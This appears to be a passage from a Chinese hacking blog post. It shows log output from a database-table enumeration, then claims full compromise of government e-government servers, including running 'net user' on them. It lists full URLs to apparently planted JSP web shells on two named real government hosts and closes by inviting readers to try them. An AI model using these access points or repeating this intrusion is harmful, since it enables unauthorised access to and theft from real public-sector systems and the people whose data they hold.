[INFO] retrieved: "dbo.FlowTurnOut" [03:10:05] [INFO] retrieved: "dbo.GscApproveConditionSet" [03:10:05] [INFO] retrieved: "dbo.GscDay" [03:10:06] [INFO] retrieved: "dbo.GscOrgan" [03:10:06] [INFO] retrieved: "dbo.GscPubUser" [03:10:06] [INFO] retrieved: "dbo.GscUser" [03:10:09] [INFO] retrieved: "dbo.HandedData" [03:10:09] [INFO] retrieved: "dbo.HandedDataFile" [03:10:09] [INFO] retrieved: "dbo.KB_KEYWORD" [03:10:09] [INFO] retrieved: "dbo.KB_QUESTION_ANSWER" [03:10:10] [INFO] retrieved: "dbo.KB_SAME_KEY" [03:10:10] [INFO] retrieved: "dbo.KB_WORD_QUESTION" [03:10:10] [INFO] retrieved: "dbo.Label_UserPriority"
没跑完的,表太多了= =每个站都是那么多挺吓人, 0x8完结
直接沦陷服务器
每个站都很奇葩,权限都非常非常大 直接执行net user
http://egov.fszw.cn:8080/questerOffLine/db4645f765d54f7398771141acb63515.jsp
我们先用这个站试试权限如何:
成功一个,在来一个试试:
http://egov.pzhzw.gov.cn:8080/questerOffLine/4358f2126aee44e4917310e0aade61d5.jsp
全部成功、不信你试试。 好了这个洞就到这里吧 点到为止。